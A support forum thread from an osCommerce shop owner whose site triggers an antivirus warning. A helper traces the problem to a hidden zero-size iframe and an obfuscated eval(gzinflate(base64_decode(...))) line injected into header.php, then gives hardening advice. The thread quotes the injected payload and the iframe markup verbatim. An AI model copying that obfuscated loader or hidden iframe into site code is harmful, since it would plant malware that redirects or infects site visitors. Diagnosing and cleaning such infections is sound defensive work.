Iframe-inf infection

[gcap]

Hi, Avast is saying my site www.brentwoodnursery.co.za/\{gzip} has traces of html:iframe-inf. I have spoken to my host who say that the site has not been hacked. I did install an add on to allow me to run a list of my products. the problem is that on my pc at work it doesnt issue any warning and I cant find any infected text or trace of the text 'iframe' in any index.php or index.html files. I have just launched the site and look really silly with new customes being told that the site is dangerous. I dont know where to find this infected text or how to erase this annoying issue.

[germ]

From your HTML source:

 

<!-- header //-->
<iframe src="http://CoinUrlRedirection.com/x/?src=dg&id=20492" width="0" height="0" scrolling="no" frameborder="0"></iframe><!-- header_eof //-->

Looks like it's in /includes/header.php

[gcap]

Thank you ever so much, I ask you two things?

 

1. how did you find it so quick

2. what should i delete from here

 

<?php

/*

$Id: header.php,v 1.42 2003/06/10 18:20:38 hpdl Exp $

 

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

 

Copyright © 2003 osCommerce

 

Released under the GNU General Public License

*/

eval(gzinflate(base64_decode('JY5NCsIwEEb3hd4hzMLuTClu1PwsvIHgATQZk4E0I9OAHl9bdx+8B+/zzvi+w5BZDYaecp9RLRIs5NZeJ60vTPUm5YqRBEMjrvvAs/5ov1ox7SjaaTwcJ1Bvii1bGEFlpJTbNpcgXArVZKEyqC3wYIkoK3ZG/5tuOPed/335Ag==')));

 

// check if the 'install' directory exists, and warn of its existence

if (WARN_INSTALL_EXISTENCE == 'true') {

if (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/install')) {

$messageStack->add('header', WARNING_INSTALL_DIRECTORY_EXISTS, 'warning');

}

}

 

// check if the configure.php file is writeable

if (WARN_CONFIG_WRITEABLE == 'true') {

if ( (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) && (is_writeable(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) ) {

$messageStack->add('header', WARNING_CONFIG_FILE_WRITEABLE, 'warning');

}

}

 

// check if the session folder is writeable

if (WARN_SESSION_DIRECTORY_NOT_WRITEABLE == 'true') {

if (STORE_SESSIONS == '') {

if (!is_dir(tep_session_save_path())) {

$messageStack->add('header', WARNING_SESSION_DIRECTORY_NON_EXISTENT, 'warning');

} elseif (!is_writeable(tep_session_save_path())) {

$messageStack->add('header', WARNING_SESSION_DIRECTORY_NOT_WRITEABLE, 'warning');

}

}

}

 

// check session.auto_start is disabled

if ( (function_exists('ini_get')) && (WARN_SESSION_AUTO_START == 'true') ) {

if (ini_get('session.auto_start') == '1') {

$messageStack->add('header', WARNING_SESSION_AUTO_START, 'warning');

}

}

 

if ( (WARN_DOWNLOAD_DIRECTORY_NOT_READABLE == 'true') && (DOWNLOAD_ENABLED == 'true') ) {

if (!is_dir(DIR_FS_DOWNLOAD)) {

$messageStack->add('header', WARNING_DOWNLOAD_DIRECTORY_NON_EXISTENT, 'warning');

}

}

 

if ($messageStack->size('header') > 0) {

echo $messageStack->output('header');

}

 

?>

[germ]

Evil code:

 

eval(gzinflate(base64_decode('JY5NCsIwEEb3hd4hzMLuTClu1PwsvIHgATQZk4E0I9OAHl9bdx+8B+/zzvi+w5BZDYaecp9RLRIs5NZeJ60vTPUm5YqRBEMjrvvAs/5ov1ox7SjaaTwcJ1Bvii1bGEFlpJTbNpcgXArVZKEyqC3wYIkoK3ZG/5tuOPed/335Ag==')));

:o

 

I have a program I wrote on the site I manage that I can tell it to visit any web page and it writes the source code of that web page to a text file so I can examine it.

 

Very useful and written just for this purpose.

:)

[gcap]

Listen, that nearly cost me my business and certainly set us back a bit so a massive thank you - it has worked. Any advice to avoid it happening again? Hosts said the site wasnt hacked but something went wrong. Thank goodness people like you are around or I would have been stumped. Again, goodnight and thank you

[germ]

Listen, that nearly cost me my business and certainly set us back a bit so a massive thank you - it has worked. Any advice to avoid it happening again? Hosts said the site wasnt hacked but something went wrong. Thank goodness people like you are around or I would have been stumped. Again, goodnight and thank you

You need to protect your admin with a .htaccess file - ASAP

 

In the admin remove file_manager.php and define_language.php - both are extreme security risks.

 

And read the "How to secure your site" thread in this section of the forum.

[gcap]

delete filemanager_php and define_language.php? any negatives to doing this? what exactly is a .htacess file

[germ]

delete filemanager_php and define_language.php? any negatives to doing this? what exactly is a .htacess file

Obviously you wouldn't be able to use said files, but they aren't necessary for shop operation.

 

The file manager is a text editor (a faulty one at times). Better to use the one in your hosts cPanel or use FTP.

 

I'm not sure what the define language file is for?

:unsure:

 

Search the web about .htaccess

 

It adds another layer of protection to the admin.

 

Both of the files I mentioned have secuuity issues that allow a hacker to bypass your admin login screen and access these files in a harmful fashion.

 

That's probably how the rogue code got there to begin with.